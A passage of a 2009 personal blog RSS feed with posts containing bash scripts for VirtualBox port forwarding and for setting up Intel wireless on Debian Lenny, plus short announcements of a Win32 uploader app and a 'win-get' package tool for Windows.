	<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;  Usage: vbox-portfwd -s -d <span style="color: #000099; font-weight: bold;">\&quot;</span>Proxy<span style="color: #000099; font-weight: bold;">\&quot;</span> -m <span style="color: #000099; font-weight: bold;">\&quot;</span>WinXP<span style="color: #000099; font-weight: bold;">\&quot;</span> -n 8080 -l 3128 -p TCP&quot;</span>
	<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;  Usage: vbox-portfwd -u -d <span style="color: #000099; font-weight: bold;">\&quot;</span>Proxy<span style="color: #000099; font-weight: bold;">\&quot;</span> -m <span style="color: #000099; font-weight: bold;">\&quot;</span>WinXP<span style="color: #000099; font-weight: bold;">\&quot;</span>&quot;</span>
	<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;<span style="color: #000099; font-weight: bold;">\n</span>Notes:<span style="color: #000099; font-weight: bold;">\n</span>  Protocol TCP is default option, if not given -p flag&quot;</span>
	<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;  Use this script when VirtualBox Machine status [Power Off]<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span>
<span style="color: #7a0874; font-weight: bold;">&#125;</span>
&nbsp;
<span style="color: #000000; font-weight: bold;">while</span> <span style="color: #7a0874; font-weight: bold;">getopts</span>  <span style="color: #ff0000;">&quot;usd:m:n:g:l:p:&quot;</span> flag
<span style="color: #000000; font-weight: bold;">do</span>
	<span style="color: #000000; font-weight: bold;">if</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #ff0000;">&quot;<span style="color: #007800;">$flag</span>&quot;</span> = <span style="color: #ff0000;">&quot;s&quot;</span> <span style="color: #7a0874; font-weight: bold;">&#93;</span>
	<span style="color: #000000; font-weight: bold;">then</span>
		<span style="color: #007800;">OP</span>=<span style="color: #000000; font-weight: bold;">set</span>
	<span style="color: #000000; font-weight: bold;">elif</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #ff0000;">&quot;<span style="color: #007800;">$flag</span>&quot;</span> = <span style="color: #ff0000;">&quot;u&quot;</span> <span style="color: #7a0874; font-weight: bold;">&#93;</span>
	<span style="color: #000000; font-weight: bold;">then</span>
		<span style="color: #007800;">OP</span>=<span style="color: #7a0874; font-weight: bold;">unset</span>
	<span style="color: #000000; font-weight: bold;">else</span>
		<span style="color: #7a0874; font-weight: bold;">eval</span> <span style="color: #007800;">$flag</span>=<span style="color: #007800;">$OPTARG</span>
	<span style="color: #000000; font-weight: bold;">fi</span>
<span style="color: #000000; font-weight: bold;">done</span>
&nbsp;
<span style="color: #000000; font-weight: bold;">if</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #660033;">-z</span> <span style="color: #007800;">$OP</span> <span style="color: #7a0874; font-weight: bold;">&#93;</span>
<span style="color: #000000; font-weight: bold;">then</span>
	vbox-portfwd-help
	<span style="color: #7a0874; font-weight: bold;">exit</span>
<span style="color: #000000; font-weight: bold;">fi</span>
&nbsp;
<span style="color: #000000; font-weight: bold;">if</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #660033;">-z</span> <span style="color: #007800;">$p</span> <span style="color: #7a0874; font-weight: bold;">&#93;</span>
<span style="color: #000000; font-weight: bold;">then</span>
	<span style="color: #007800;">p</span>=TCP
<span style="color: #000000; font-weight: bold;">fi</span>
&nbsp;
<span style="color: #000000; font-weight: bold;">if</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #ff0000;">&quot;<span style="color: #007800;">$OP</span>&quot;</span> = <span style="color: #ff0000;">&quot;set&quot;</span> <span style="color: #7a0874; font-weight: bold;">&#93;</span>
<span style="color: #000000; font-weight: bold;">then</span>
	<span style="color: #007800;">PROTOCOL</span>=<span style="color: #007800;">$p</span>
	<span style="color: #007800;">GUEST</span>=<span style="color: #007800;">$m</span>
	<span style="color: #007800;">GUEST_PORT</span>=<span style="color: #007800;">$n</span>
	<span style="color: #007800;">HOST_PORT</span>=<span style="color: #007800;">$l</span>
	<span style="color: #007800;">DESCRIPTIVE_NAME</span>=<span style="color: #007800;">$d</span>
	<span style="color: #000000; font-weight: bold;">if</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #660033;">-z</span> <span style="color: #ff0000;">&quot;<span style="color: #007800;">$GUEST</span>&quot;</span> <span style="color: #660033;">-o</span> <span style="color: #660033;">-z</span> <span style="color: #ff0000;">&quot;<span style="color: #007800;">$DESCRIPTIVE_NAME</span>&quot;</span> <span style="color: #660033;">-o</span> <span style="color: #660033;">-z</span> <span style="color: #ff0000;">&quot;<span style="color: #007800;">$GUEST_PORT</span>&quot;</span> <span style="color: #660033;">-o</span> <span style="color: #660033;">-z</span> <span style="color: #ff0000;">&quot;<span style="color: #007800;">$HOST_PORT</span>&quot;</span> <span style="color: #7a0874; font-weight: bold;">&#93;</span>
	<span style="color: #000000; font-weight: bold;">then</span>
		vbox-portfwd-help
		<span style="color: #7a0874; font-weight: bold;">exit</span>
	<span style="color: #000000; font-weight: bold;">fi</span>
<span style="color: #000000; font-weight: bold;">fi</span>
&nbsp;
<span style="color: #000000; font-weight: bold;">if</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #ff0000;">&quot;<span style="color: #007800;">$OP</span>&quot;</span> = <span style="color: #ff0000;">&quot;unset&quot;</span> <span style="color: #7a0874; font-weight: bold;">&#93;</span>
<span style="color: #000000; font-weight: bold;">then</span>
	<span style="color: #007800;">GUEST</span>=<span style="color: #007800;">$m</span>
	<span style="color: #007800;">DESCRIPTIVE_NAME</span>=<span style="color: #007800;">$d</span>
	<span style="color: #000000; font-weight: bold;">if</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #660033;">-z</span> <span style="color: #ff0000;">&quot;<span style="color: #007800;">$GUEST</span>&quot;</span> <span style="color: #660033;">-o</span> <span style="color: #660033;">-z</span> <span style="color: #ff0000;">&quot;<span style="color: #007800;">$DESCRIPTIVE_NAME</span>&quot;</span> <span style="color: #7a0874; font-weight: bold;">&#93;</span>
	<span style="color: #000000; font-weight: bold;">then</span>
		vbox-portfwd-help
		<span style="color: #7a0874; font-weight: bold;">exit</span>
	<span style="color: #000000; font-weight: bold;">fi</span>
<span style="color: #000000; font-weight: bold;">fi</span>
&nbsp;
<span style="color: #000000; font-weight: bold;">case</span> <span style="color: #007800;">$OP</span> <span style="color: #000000; font-weight: bold;">in</span>
	<span style="color: #000000; font-weight: bold;">set</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>
		vboxmanage setextradata <span style="color: #007800;">$GUEST</span> <span style="color: #ff0000;">&quot;VBoxInternal/Devices/pcnet/0/LUN#0/Config/<span style="color: #007800;">$DESCRIPTIVE_NAME</span>/HostPort&quot;</span> <span style="color: #007800;">$HOST_PORT</span>
		vboxmanage setextradata <span style="color: #007800;">$GUEST</span> <span style="color: #ff0000;">&quot;VBoxInternal/Devices/pcnet/0/LUN#0/Config/<span style="color: #007800;">$DESCRIPTIVE_NAME</span>/GuestPort&quot;</span> <span style="color: #007800;">$GUEST_PORT</span>
		vboxmanage setextradata <span style="color: #007800;">$GUEST</span> <span style="color: #ff0000;">&quot;VBoxInternal/Devices/pcnet/0/LUN#0/Config/<span style="color: #007800;">$DESCRIPTIVE_NAME</span>/Protocol&quot;</span> <span style="color: #007800;">$PROTOCOL</span>
		<span style="color: #000000; font-weight: bold;">;;</span>
	<span style="color: #7a0874; font-weight: bold;">unset</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>
		vboxmanage setextradata <span style="color: #007800;">$GUEST</span> <span style="color: #ff0000;">&quot;VBoxInternal/Devices/pcnet/0/LUN#0/Config/<span style="color: #007800;">$DESCRIPTIVE_NAME</span>/HostPort&quot;</span>
		vboxmanage setextradata <span style="color: #007800;">$GUEST</span> <span style="color: #ff0000;">&quot;VBoxInternal/Devices/pcnet/0/LUN#0/Config/<span style="color: #007800;">$DESCRIPTIVE_NAME</span>/GuestPort&quot;</span>
		vboxmanage setextradata <span style="color: #007800;">$GUEST</span> <span style="color: #ff0000;">&quot;VBoxInternal/Devices/pcnet/0/LUN#0/Config/<span style="color: #007800;">$DESCRIPTIVE_NAME</span>/Protocol&quot;</span>
		<span style="color: #000000; font-weight: bold;">;;</span>
<span style="color: #000000; font-weight: bold;">esac</span></pre></div></div>

<p><a href="http://albertux.ayalasoft.com/es/2009/07/17/virtualbox-port-forward-bash-script/">VirtualBox Port Forward Bash Script</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></content:encoded>
			<wfw:commentRss>http://albertux.ayalasoft.com/es/2009/07/17/virtualbox-port-forward-bash-script/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Debian Lenny Intel(R) Pro/Wireless</title>
		<link>http://albertux.ayalasoft.com/es/2009/05/12/debian-lenny-intel-pro-wireless/</link>
		<comments>http://albertux.ayalasoft.com/es/2009/05/12/debian-lenny-intel-pro-wireless/#comments</comments>
		<pubDate>Wed, 13 May 2009 03:48:25 +0000</pubDate>
		<dc:creator>albertux</dc:creator>
				<category><![CDATA[network]]></category>
		<category><![CDATA[unix/linux]]></category>
		<category><![CDATA[debian]]></category>
		<category><![CDATA[lenny]]></category>
		<category><![CDATA[wireless]]></category>

		<guid isPermaLink="false">http://albertux.ayalasoft.com/es/?p=2006</guid>
		<description><![CDATA[Debian Lenny Intel(R) Pro/Wireless After you install Debian using netInstall using wire interface you can install the firmware that support your wireless interface this is example script: #!/bin/bash # Debian Lenny Wireless script for Intel(R) Pro/Wireless 4954 or 3945 # Author: Albertux (Alberto Isaac Ayala Esquivias) # Mail: &#60;albertoi7@gmail.com&#62; # Web: http://Albertux.AyalaSoft.com &#160; if &#91;&#91; [...]<p><a href="http://albertux.ayalasoft.com/es/2009/05/12/debian-lenny-intel-pro-wireless/">Debian Lenny Intel(R) Pro/Wireless</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></description>
			<content:encoded><![CDATA[<p><strong>Debian Lenny Intel(R) Pro/Wireless</strong></p>
<p>After you install Debian using netInstall using wire interface you can install the firmware that support your wireless interface this is example script:</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #666666; font-style: italic;">#!/bin/bash</span>
<span style="color: #666666; font-style: italic;"># Debian Lenny Wireless script for Intel(R) Pro/Wireless 4954 or 3945</span>
<span style="color: #666666; font-style: italic;"># Author: Albertux (Alberto Isaac Ayala Esquivias)</span>
<span style="color: #666666; font-style: italic;"># Mail: &lt;albertoi7@gmail.com&gt;</span>
<span style="color: #666666; font-style: italic;"># Web: http://Albertux.AyalaSoft.com</span>
&nbsp;
<span style="color: #000000; font-weight: bold;">if</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span><span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #007800;">$EUID</span> <span style="color: #660033;">-ne</span> <span style="color: #000000;">0</span> <span style="color: #7a0874; font-weight: bold;">&#93;</span><span style="color: #7a0874; font-weight: bold;">&#93;</span>; <span style="color: #000000; font-weight: bold;">then</span> 
  <span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #ff0000;">&quot;You must be a root user&quot;</span> <span style="color: #000000;">2</span><span style="color: #000000; font-weight: bold;">&gt;&amp;</span><span style="color: #000000;">1</span>
  <span style="color: #7a0874; font-weight: bold;">exit</span> <span style="color: #000000;">1</span>
<span style="color: #000000; font-weight: bold;">fi</span>
&nbsp;
<span style="color: #000000; font-weight: bold;">for</span> m <span style="color: #000000; font-weight: bold;">in</span> iwl4965 iwl3945
<span style="color: #000000; font-weight: bold;">do</span>
  <span style="color: #007800;">model</span>=$<span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #000000; font-weight: bold;">`</span><span style="color: #c20cb9; font-weight: bold;">dmesg</span>  <span style="color: #000000; font-weight: bold;">|</span> <span style="color: #c20cb9; font-weight: bold;">grep</span> <span style="color: #007800;">$m</span> <span style="color: #000000; font-weight: bold;">|</span> <span style="color: #c20cb9; font-weight: bold;">awk</span> <span style="color: #ff0000;">' { print $3 }'</span> <span style="color: #000000; font-weight: bold;">|</span>  <span style="color: #c20cb9; font-weight: bold;">wc</span> -l<span style="color: #000000; font-weight: bold;">`</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>
  <span style="color: #000000; font-weight: bold;">if</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #007800;">$model</span> <span style="color: #660033;">-ne</span> <span style="color: #000000;">0</span> <span style="color: #7a0874; font-weight: bold;">&#93;</span>; <span style="color: #000000; font-weight: bold;">then</span>
    <span style="color: #007800;">model</span>=<span style="color: #007800;">$m</span>
    <span style="color: #7a0874; font-weight: bold;">break</span>;
  <span style="color: #000000; font-weight: bold;">fi</span>
<span style="color: #000000; font-weight: bold;">done</span>
&nbsp;
<span style="color: #000000; font-weight: bold;">if</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #ff0000;">&quot;<span style="color: #007800;">$model</span>&quot;</span> <span style="color: #000000; font-weight: bold;">!</span>= <span style="color: #ff0000;">&quot;<span style="color: #007800;">$m</span>&quot;</span> <span style="color: #7a0874; font-weight: bold;">&#93;</span>; <span style="color: #000000; font-weight: bold;">then</span>
  <span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;\e[01;33mWARNING!&quot;</span>
  <span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;\e[01;33mDoesn't have Intel(R) PRO/Wireless 4965 or 3945 Models\e[00m&quot;</span>
  <span style="color: #7a0874; font-weight: bold;">exit</span>;
<span style="color: #000000; font-weight: bold;">else</span>
  <span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;\e[01;32mYou have Intel(R) PRO/Wireless <span style="color: #007800;">$model</span>\e[00m&quot;</span>
<span style="color: #000000; font-weight: bold;">fi</span>
&nbsp;
<span style="color: #007800;">firmware</span>=$<span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #000000; font-weight: bold;">`</span><span style="color: #c20cb9; font-weight: bold;">dpkg</span> <span style="color: #660033;">-l</span> <span style="color: #000000; font-weight: bold;">|</span> <span style="color: #c20cb9; font-weight: bold;">grep</span> firmware-iwlwifi <span style="color: #000000; font-weight: bold;">|</span> <span style="color: #c20cb9; font-weight: bold;">awk</span> <span style="color: #ff0000;">'{ print $1 }'</span><span style="color: #000000; font-weight: bold;">`</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>
<span style="color: #007800;">mod</span>=$<span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #000000; font-weight: bold;">`</span><span style="color: #c20cb9; font-weight: bold;">lsmod</span>  <span style="color: #000000; font-weight: bold;">|</span> <span style="color: #c20cb9; font-weight: bold;">awk</span> <span style="color: #ff0000;">'{ print $1 }'</span>  <span style="color: #000000; font-weight: bold;">|</span> <span style="color: #c20cb9; font-weight: bold;">grep</span> <span style="color: #007800;">$model</span><span style="color: #000000; font-weight: bold;">`</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>
&nbsp;
<span style="color: #000000; font-weight: bold;">if</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #ff0000;">&quot;<span style="color: #007800;">$firmware</span>&quot;</span> <span style="color: #000000; font-weight: bold;">!</span>= <span style="color: #ff0000;">&quot;ii&quot;</span> <span style="color: #7a0874; font-weight: bold;">&#93;</span>; <span style="color: #000000; font-weight: bold;">then</span>
  <span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;Install firmware ...&quot;</span>
  <span style="color: #c20cb9; font-weight: bold;">apt-get</span> <span style="color: #c20cb9; font-weight: bold;">install</span> firmware-iwlwifi
<span style="color: #000000; font-weight: bold;">fi</span>
&nbsp;
<span style="color: #000000; font-weight: bold;">if</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #ff0000;">&quot;<span style="color: #007800;">$model</span>&quot;</span> <span style="color: #000000; font-weight: bold;">!</span>= <span style="color: #ff0000;">&quot;<span style="color: #007800;">$mod</span>&quot;</span> <span style="color: #7a0874; font-weight: bold;">&#93;</span>; <span style="color: #000000; font-weight: bold;">then</span>
  <span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;Install module ...&quot;</span>
  modprobe <span style="color: #007800;">$model</span>
<span style="color: #000000; font-weight: bold;">fi</span>
<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;<span style="color: #000099; font-weight: bold;">\n</span>name<span style="color: #000099; font-weight: bold;">\t</span>  description<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span>
iwconfig
<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-n</span> <span style="color: #ff0000;">&quot;Name of the interface with wireless extensions: &quot;</span>
<span style="color: #c20cb9; font-weight: bold;">read</span> iface
&nbsp;
<span style="color: #c20cb9; font-weight: bold;">ifconfig</span> <span style="color: #007800;">$iface</span> up
<span style="color: #c20cb9; font-weight: bold;">clear</span>
<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">&quot;Scanning Wireless ...&quot;</span>
iwlist <span style="color: #007800;">$iface</span> scanning 
&nbsp;
<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-n</span> <span style="color: #ff0000;">&quot;essid: &quot;</span>
<span style="color: #c20cb9; font-weight: bold;">read</span> essid
&nbsp;
<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-n</span> <span style="color: #ff0000;">&quot;Need Key (y/n): &quot;</span>
<span style="color: #000000; font-weight: bold;">if</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #ff0000;">&quot;<span style="color: #007800;">$op</span>&quot;</span> = <span style="color: #ff0000;">&quot;n&quot;</span> <span style="color: #7a0874; font-weight: bold;">&#93;</span>; <span style="color: #000000; font-weight: bold;">then</span>
  iwconfig <span style="color: #007800;">$iface</span> essid <span style="color: #ff0000;">&quot;<span style="color: #007800;">$essid</span>&quot;</span>
<span style="color: #000000; font-weight: bold;">else</span>
  <span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-n</span> <span style="color: #ff0000;">&quot;key: &quot;</span>
  <span style="color: #c20cb9; font-weight: bold;">read</span> key
  iwconfig <span style="color: #007800;">$iface</span> essid <span style="color: #ff0000;">&quot;<span style="color: #007800;">$essid</span>&quot;</span> key <span style="color: #ff0000;">&quot;<span style="color: #007800;">$key</span>&quot;</span>
<span style="color: #000000; font-weight: bold;">fi</span>
&nbsp;
<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-n</span> <span style="color: #ff0000;">&quot;Static IP? (y/n): &quot;</span>
<span style="color: #c20cb9; font-weight: bold;">read</span> op
&nbsp;
<span style="color: #000000; font-weight: bold;">if</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span> <span style="color: #ff0000;">&quot;<span style="color: #007800;">$op</span>&quot;</span> = <span style="color: #ff0000;">&quot;n&quot;</span> <span style="color: #7a0874; font-weight: bold;">&#93;</span>; <span style="color: #000000; font-weight: bold;">then</span>
  dhclient <span style="color: #007800;">$iface</span>
<span style="color: #000000; font-weight: bold;">else</span>
 <span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-n</span> <span style="color: #ff0000;">&quot;What ip you want: &quot;</span>
 <span style="color: #c20cb9; font-weight: bold;">read</span> ip
 <span style="color: #c20cb9; font-weight: bold;">ifconfig</span> <span style="color: #007800;">$iface</span> <span style="color: #007800;">$ip</span>
<span style="color: #000000; font-weight: bold;">fi</span>
&nbsp;
<span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #660033;">-n</span> <span style="color: #ff0000;">&quot;Gateway: &quot;</span>
<span style="color: #c20cb9; font-weight: bold;">read</span> gw
&nbsp;
route add default gw <span style="color: #007800;">$gw</span> <span style="color: #007800;">$iface</span></pre></div></div>

<p><a href="http://albertux.ayalasoft.com/es/2009/05/12/debian-lenny-intel-pro-wireless/">Debian Lenny Intel(R) Pro/Wireless</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></content:encoded>
			<wfw:commentRss>http://albertux.ayalasoft.com/es/2009/05/12/debian-lenny-intel-pro-wireless/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>c/c++ win32api</title>
		<link>http://albertux.ayalasoft.com/es/2009/04/18/c-cpp-win32api/</link>
		<comments>http://albertux.ayalasoft.com/es/2009/04/18/c-cpp-win32api/#comments</comments>
		<pubDate>Sat, 18 Apr 2009 22:26:00 +0000</pubDate>
		<dc:creator>albertux</dc:creator>
				<category><![CDATA[develop]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[projects]]></category>
		<category><![CDATA[web]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[c/c++]]></category>
		<category><![CDATA[win32]]></category>
		<category><![CDATA[win32api]]></category>

		<guid isPermaLink="false">http://albertux.ayalasoft.com/es/?p=1903</guid>
		<description><![CDATA[C/C++ Win32API Win32API C/C++ Documentation: theForger&#8217;s Win32 API Tutorial [english] Win API Con Clase [spanish] I made a single uploader application (c/c++ win32api) and web administrator panel (php/javascript/mysql) c/c++ win32api is a post from: Albertux~# ./Blog<p><a href="http://albertux.ayalasoft.com/es/2009/04/18/c-cpp-win32api/">c/c++ win32api</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></description>
			<content:encoded><![CDATA[<p><strong>C/C++ Win32API</strong></p>
<p>Win32API C/C++ Documentation:</p>
<p><a href="http://www.winprog.org/tutorial/" target="_blank">theForger&#8217;s Win32 API Tutorial</a> [english]<br />
<a href="http://winapi.conclase.net/" target="_blank">Win API Con Clase</a> [spanish]</p>
<p>I made a single uploader application (c/c++ win32api) and web administrator panel (php/javascript/mysql)</p>
<p><script src="http://ayalasoft.com/media/swfobject.js" type="text/javascript"></script></p>
<div id="playerup"><script type="text/javascript"><!--
var sup = new SWFObject("http://ayalasoft.com/media/flvplayer.swf","single","576","360","7");
		sup.addParam("allowfullscreen","true");
sup.addVariable("file","http://ayalasoft.com/media/uploader.flv");
		sup.addVariable("width","576");
		sup.addVariable("height","360");
sup.addVariable("autostart", "true")
sup.addVariable("repeat", "true")
		sup.write("playerup");
// --></script></div>
<p><a href="http://albertux.ayalasoft.com/es/2009/04/18/c-cpp-win32api/">c/c++ win32api</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></content:encoded>
			<wfw:commentRss>http://albertux.ayalasoft.com/es/2009/04/18/c-cpp-win32api/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>win-get apt-get for windows</title>
		<link>http://albertux.ayalasoft.com/es/2009/04/09/win-get-apt-get-for-windows/</link>
		<comments>http://albertux.ayalasoft.com/es/2009/04/09/win-get-apt-get-for-windows/#comments</comments>
		<pubDate>Thu, 09 Apr 2009 19:18:52 +0000</pubDate>
		<dc:creator>albertux</dc:creator>
				<category><![CDATA[develop]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[projects]]></category>
		<category><![CDATA[web]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[perl]]></category>
		<category><![CDATA[tool]]></category>

		<guid isPermaLink="false">http://albertux.ayalasoft.com/es/?p=1883</guid>
		<description><![CDATA[win-get apt-get for windows One thing I love of Debian is apt-get command, so why not have not the same, ok not the same but something similar run on Windows?, I search some projects on sf.net but don&#8217;t work or are not updated, so I made my own project and works fine: You can download [...]<p><a href="http://albertux.ayalasoft.com/es/2009/04/09/win-get-apt-get-for-windows/">win-get apt-get for windows</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></description>
			<content:encoded><![CDATA[<p><strong>win-get apt-get for windows</strong></p>
<p>One thing I love of Debian is apt-get command, so why not have not the same, ok not the same but something similar run on Windows?, I search some projects on <a href="http://sf.net" target="_blank">sf.net</a> but don&#8217;t work or are not updated, so I made my own project and works fine:</p>
<p><a href="http://ayalasoft.com/img/win-get-run.jpg" rel="shadowbox"><img src="http://ayalasoft.com/img/win-get-run-thumb.jpg"></a></p>
<p>You can download executable file and source file (perl script) on:<br />
<a href="http://win-get.ayalasoft.com" target="_blank">http://win-get.ayalasoft.com</a></p>
<p><a href="http://albertux.ayalasoft.com/es/2009/04/09/win-get-apt-get-for-windows/">win-get apt-get for windows</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></content:encoded>
			<wfw:commentRss>http://albertux.ayalasoft.com/es/2009/04/09/win-get-apt-get-for-windows/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
